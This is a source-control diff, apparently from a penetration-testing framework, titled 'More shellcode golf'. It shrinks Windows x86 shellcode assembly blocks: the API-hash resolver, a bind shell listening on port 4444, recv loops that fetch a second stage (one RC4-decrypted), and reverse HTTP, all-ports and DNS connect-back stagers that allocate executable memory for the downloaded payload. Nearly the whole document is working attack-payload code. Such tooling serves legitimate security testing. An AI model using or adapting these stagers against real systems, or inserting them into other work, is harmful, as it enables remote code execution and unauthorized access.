More shellcode golf

Author: schierlm

external/source/shellcode/windows/x86/src/block/block_api.asm

@@ -2,7 +2,7 @@
 ; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
 ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
 ; Version: 1.0 (24 July 2009)
-; Size: 137 bytes
+; Size: 130 bytes
 ;-----------------------------------------------------------------------------;
 
 [BITS 32]
@@ -17,16 +17,15 @@
 api_call:
   pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
   mov ebp, esp           ; Create a new stack frame
-  xor edx, edx           ; Zero EDX
-  mov edx, [fs:edx+48]   ; Get a pointer to the PEB
+  xor eax, eax           ; Zero EAX (upper 3 bytes will remain zero until function is found)
+  mov edx, [fs:eax+48]   ; Get a pointer to the PEB
   mov edx, [edx+12]      ; Get PEB->Ldr
   mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
 next_mod:                ;
   mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
   movzx ecx, word [edx+38] ; Set ECX to the length we want to check
   xor edi, edi           ; Clear EDI which will store the hash of the module name
 loop_modname:            ;
-  xor eax, eax           ; Clear EAX
   lodsb                  ; Read in the next byte of the name
   cmp al, 'a'            ; Some versions of Windows use lower case module names
   jl not_lowercase       ;
@@ -41,10 +40,10 @@ not_lowercase:           ;
   push edi               ; Save the current module hash for later
   ; Proceed to iterate the export address table,
   mov edx, [edx+16]      ; Get this modules base address
-  mov eax, [edx+60]      ; Get PE header
+  mov ecx, [edx+60]      ; Get PE header
 
   ; use ecx as our EAT pointer here so we can take advantage of jecxz.
-  mov ecx, [eax+edx+120] ; Get the EAT from the PE header
+  mov ecx, [ecx+edx+120] ; Get the EAT from the PE header
   jecxz get_next_mod1    ; If no EAT present, process the next module
   add ecx, edx           ; Add the modules base address
   push ecx               ; Save the current modules EAT
@@ -62,7 +61,6 @@ get_next_func:           ;
   xor edi, edi           ; Clear EDI which will store the hash of the function name
   ; And compare it to the one we want
 loop_funcname:           ;
-  xor eax, eax           ; Clear EAX
   lodsb                  ; Read in the next byte of the ASCII function name
   ror edi, 13            ; Rotate right our hash value
   add edi, eax           ; Add the next byte of the name
@@ -94,7 +92,7 @@ finish:
   ; We now automagically return to the correct caller...
 
 get_next_mod:            ;
-  pop eax                ; Pop off the current (now the previous) modules EAT
+  pop edi                ; Pop off the current (now the previous) modules EAT
 get_next_mod1:           ;
   pop edi                ; Pop off the current (now the previous) modules hash
   pop edx                ; Restore our position in the module list

external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm

@@ -23,10 +23,16 @@ bind_tcp:
   push 0x006B8029        ; hash( "ws2_32.dll", "WSAStartup" )
   call ebp               ; WSAStartup( 0x0190, &WSAData );
   
-  push eax               ; if we succeed, eax wil be zero, push zero for the flags param.
-  push eax               ; push null for reserved parameter
-  push eax               ; we do not specify a WSAPROTOCOL_INFO structure
-  push eax               ; we do not specify a protocol
+  push byte 8
+  pop ecx
+push_8_loop:
+  push eax               ; if we succeed, eax will be zero, push it 8 times for later ([1]-[8])
+  loop push_8_loop
+
+                         ; push zero for the flags param [8]
+                         ; push null for reserved parameter [7]
+                         ; we do not specify a WSAPROTOCOL_INFO structure [6]
+                         ; we do not specify a protocol [5]
   inc eax                ;
   push eax               ; push SOCK_STREAM
   inc eax                ;
@@ -35,8 +41,7 @@ bind_tcp:
   call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
   xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
   
-  xor ebx, ebx           ; Clear EBX
-  push ebx               ; bind to 0.0.0.0
+                         ; bind to 0.0.0.0, pushed earlier [4]
   push 0x5C110002        ; family AF_INET and port 4444
   mov esi, esp           ; save a pointer to sockaddr_in struct
   push byte 16           ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
@@ -45,13 +50,13 @@ bind_tcp:
   push 0x6737DBC2        ; hash( "ws2_32.dll", "bind" )
   call ebp               ; bind( s, &sockaddr_in, 16 );
 
-  push ebx               ; backlog
+                         ; backlog, pushed earlier [3]
   push edi               ; socket
   push 0xFF38E9B7        ; hash( "ws2_32.dll", "listen" )
   call ebp               ; listen( s, 0 );
 
-  push ebx               ; we set length for the sockaddr struct to zero
-  push ebx               ; we dont set the optional sockaddr param
+                         ; we set length for the sockaddr struct to zero, pushed earlier [2]
+                         ; we dont set the optional sockaddr param, pushed earlier [1]
   push edi               ; listening socket
   push 0xE13BEC74        ; hash( "ws2_32.dll", "accept" )
   call ebp               ; accept( s, 0, 0 );

external/source/shellcode/windows/x86/src/block/block_recv.asm

@@ -38,7 +38,6 @@ read_more:               ;
   push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
   call ebp               ; recv( s, buffer, length, 0 );
   add ebx, eax           ; buffer += bytes_received
-  sub esi, eax           ; length -= bytes_received
-  test esi, esi          ; test length
+  sub esi, eax           ; length -= bytes_received, will set flags
   jnz read_more          ; continue if we have more to read
   ret                    ; return into the second stage

external/source/shellcode/windows/x86/src/block/block_recv_rc4.asm

@@ -48,8 +48,7 @@ read_more:               ;
   push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
   call ebp               ; recv( s, buffer, length, 0 );
   add ebx, eax           ; buffer += bytes_received
-  sub esi, eax           ; length -= bytes_received
-  test esi, esi          ; test length
+  sub esi, eax           ; length -= bytes_received, will set flags
   jnz read_more          ; continue if we have more to read
     pop ebx              ; address of S-box
     pop ecx              ; stage length

external/source/shellcode/windows/x86/src/block/block_reverse_http.asm

@@ -35,20 +35,27 @@ load_wininet:
   push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
   call ebp               ; LoadLibraryA( "wininet" )
 
-  xor ebx,ebx
+set_retry:
+  push byte 8           ; retry 8 times should be enough
+  pop edi
+  xor ebx, ebx           ; push 8 zeros ([1]-[8])
+  mov ecx, edi
+push_zeros:
+  push ebx
+  loop push_zeros
 
 internetopen:
-  push ebx               ; DWORD dwFlags
-  push ebx               ; LPCTSTR lpszProxyBypass (NULL)
-  push ebx               ; LPCTSTR lpszProxyName (NULL)
-  push ebx               ; DWORD dwAccessType (PRECONFIG = 0)
-  push ebx               ; LPCTSTR lpszAgent (NULL)
+                         ; DWORD dwFlags [1]
+                         ; LPCTSTR lpszProxyBypass (NULL) [2]
+                         ; LPCTSTR lpszProxyName (NULL) [3]
+                         ; DWORD dwAccessType (PRECONFIG = 0) [4]
+                         ; LPCTSTR lpszAgent (NULL) [5]
   push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
   call ebp
 
 internetconnect:
-  push ebx               ; DWORD_PTR dwContext (NULL)
-  push ebx               ; dwFlags
+                         ; DWORD_PTR dwContext (NULL) [6]
+                         ; dwFlags [7]
   push byte 3            ; DWORD dwService (INTERNET_SERVICE_HTTP)
   push ebx               ; password (NULL)
   push ebx               ; username (NULL)
@@ -60,23 +67,21 @@ got_server_host:
   call ebp
 
 httpopenrequest:
-  push ebx               ; dwContext (NULL)
+                         ; dwContext (NULL) [8]
   push HTTP_OPEN_FLAGS   ; dwFlags
   push ebx               ; accept types
   push ebx               ; referrer
   push ebx               ; version
-  jmp get_server_uri     ; push pointer to url
+  call got_server_uri
+server_uri:
+  db "/12345", 0x00
 got_server_uri:
   push ebx               ; method
   push eax               ; hConnection
   push 0x3B2E55EB        ; hash( "wininet.dll", "HttpOpenRequestA" )
   call ebp
   xchg esi, eax          ; save hHttpRequest in esi
 
-set_retry:
-  push byte 0x10
-  pop edi
-
 send_request:
 
 %ifdef ENABLE_SSL
@@ -123,12 +128,6 @@ failure:
 dbl_get_server_host:
   jmp get_server_host
 
-get_server_uri:
-  call got_server_uri
-
-server_uri:
- db "/12345", 0x00
-
 allocate_memory:
   push byte 0x40         ; PAGE_EXECUTE_READWRITE
   push 0x1000            ; MEM_COMMIT

external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm

@@ -51,10 +51,9 @@ try_connect:
   jz short connected
 
 port_bump:
-  xor eax, eax
   mov word ax, [esi+2]
   xchg ah,al
-  inc ax
+  inc eax
   xchg ah,al
   mov word [esi+2], ax
   jmp short try_connect

external/source/shellcode/windows/x86/src/block/block_reverse_tcp_dns.asm

@@ -36,7 +36,10 @@ reverse_tcp:
   xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
 
 get_address:
-  jmp get_hostname
+  call got_hostname
+
+hostname:
+  db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", 0x00
 
 got_hostname:
   push 0x803428A9        ; hash( "ws2_32.dll", "gethostbyname" )
@@ -66,12 +69,6 @@ handle_failure:
 failure:
   push 0x56A2B5F0        ; hardcoded to exitprocess for size
   call ebp
-
-get_hostname:
-  call got_hostname
-
-hostname:
-  db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", 0x00
 
 connected: